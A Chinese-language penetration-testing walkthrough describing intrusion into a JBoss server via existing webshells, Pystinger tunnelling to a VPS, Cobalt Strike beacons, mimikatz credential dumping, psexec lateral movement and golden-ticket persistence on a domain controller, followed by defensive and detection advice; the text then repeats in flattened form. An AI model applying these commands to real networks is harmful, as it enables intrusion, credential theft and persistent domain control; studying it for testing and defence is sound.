jboss内网渗透并拿下域控
字数 1052 2025-08-11 21:26:09

JBoss内网渗透与域控攻防实战指南

1. 环境侦察与初始访问

1.1 JBoss识别与利用

  • 发现标准JBoss登录界面,表明存在JBoss应用服务器
  • 通过上传WAR包部署Webshell是常见攻击手法
  • 攻击者发现系统上已有前辈留下的多个Webshell(JSP木马)

1.2 初始权限确认

net user /domain  # 确认存在域环境
ipconfig /all     # 确认网络配置,发现DNS设置为8.8.8.8(非域内主机典型配置)

2. 内网穿透技术

2.1 Pystinger工具使用

  • 功能:实现HTTP隧道代理,将内网流量通过Webshell转发到VPS
  • 部署步骤
    1. 上传proxy.jsp到JBoss的web目录(伪装成正常WAR包)
    2. 在内网主机上传stinger_server.exe并启动: 
      start stinger_server.exe 0.0.0.0
    3. 在VPS运行客户端: 
      ./stinger_client -w http://target/xxx.jsp -l 0.0.0.0 -p 60000

2.2 Cobalt Strike联动

  1. 设置监听器为内网地址(172.17.50.9)和端口60020
  2. 生成Windows可执行程序并通过Webshell上传执行
  3. 等待主机上线

3. 权限提升与凭证窃取

3.1 Mimikatz使用

mimikatz::sekurlsa::logonpasswords  # 抓取明文密码和哈希
  • 初始可能只能获取哈希,获得域控后可能获取明文

3.2 CS自带提权模块

  • 使用Cobalt Strike的本地提权功能获取SYSTEM权限

4. 内网横向移动

4.1 网络扫描

portscan 172.17.50.0/24 1-1024,3389,5000-6000 arp 1024
  • 发现关键主机SRV-AD(域控)

4.2 域控识别

  • AD:活动目录数据库,包含网络对象
  • DC:存放AD的计算机
  • 确认域控: 
    ping 域控名称
net user /domain

4.3 横向移动技术

  • 使用psexec跳转到SRV-AD
  • 选择SMB监听器,使用SYSTEM权限会话
  • 对其他主机(如WEBSERVICE)进行进程注入

5. 权限维持技术

5.1 黄金票据制作

所需信息

  1. 域用户名
  2. 域名
  3. 域SID(去掉最后部分,如S-1-5-21-3225502217-588435446-3680153074)
  4. krbtgt账户的哈希

验证票据

klist  # 查看票据
dir \\WEBSERVICE\C$  # 测试访问

6. 防御建议

6.1 防护措施

  1. JBoss安全加固:

    • 禁用管理界面公网访问
    • 定期更新补丁
    • 监控WAR包异常上传

  2. 域控防护:

    • 限制域管理员登录范围
    • 启用LSA保护防止凭据窃取
    • 监控Kerberos票据异常

  3. 内网监测:

    • 部署网络流量分析工具
    • 监控异常端口扫描行为
    • 限制SMB等协议的访问范围

6.2 检测要点

  1. 异常进程(如stinger_server.exe)
  2. 非常规端口连接(如60000)
  3. 来自Web服务器的异常SMB请求
  4. 黄金票据使用特征

本指南详细记录了从JBoss入侵到域控拿下的完整过程,重点突出了内网穿透、横向移动和权限维持等关键技术点,可作为渗透测试人员的学习参考和防御人员的防护指南。

JBoss内网渗透与域控攻防实战指南 1. 环境侦察与初始访问 1.1 JBoss识别与利用 发现标准JBoss登录界面,表明存在JBoss应用服务器 通过上传WAR包部署Webshell是常见攻击手法 攻击者发现系统上已有前辈留下的多个Webshell(JSP木马) 1.2 初始权限确认 2. 内网穿透技术 2.1 Pystinger工具使用 功能 :实现HTTP隧道代理,将内网流量通过Webshell转发到VPS 部署步骤 : 上传proxy.jsp到JBoss的web目录(伪装成正常WAR包) 在内网主机上传stinger_ server.exe并启动: 在VPS运行客户端: 2.2 Cobalt Strike联动 设置监听器为内网地址(172.17.50.9)和端口60020 生成Windows可执行程序并通过Webshell上传执行 等待主机上线 3. 权限提升与凭证窃取 3.1 Mimikatz使用 初始可能只能获取哈希,获得域控后可能获取明文 3.2 CS自带提权模块 使用Cobalt Strike的本地提权功能获取SYSTEM权限 4. 内网横向移动 4.1 网络扫描 发现关键主机SRV-AD(域控) 4.2 域控识别 AD :活动目录数据库,包含网络对象 DC :存放AD的计算机 确认域控: 4.3 横向移动技术 使用psexec跳转到SRV-AD 选择SMB监听器,使用SYSTEM权限会话 对其他主机(如WEBSERVICE)进行进程注入 5. 权限维持技术 5.1 黄金票据制作 所需信息 : 域用户名 域名 域SID(去掉最后部分,如S-1-5-21-3225502217-588435446-3680153074) krbtgt账户的哈希 验证票据 : 6. 防御建议 6.1 防护措施 JBoss安全加固: 禁用管理界面公网访问 定期更新补丁 监控WAR包异常上传 域控防护: 限制域管理员登录范围 启用LSA保护防止凭据窃取 监控Kerberos票据异常 内网监测: 部署网络流量分析工具 监控异常端口扫描行为 限制SMB等协议的访问范围 6.2 检测要点 异常进程(如stinger_ server.exe) 非常规端口连接(如60000) 来自Web服务器的异常SMB请求 黄金票据使用特征 本指南详细记录了从JBoss入侵到域控拿下的完整过程,重点突出了内网穿透、横向移动和权限维持等关键技术点,可作为渗透测试人员的学习参考和防御人员的防护指南。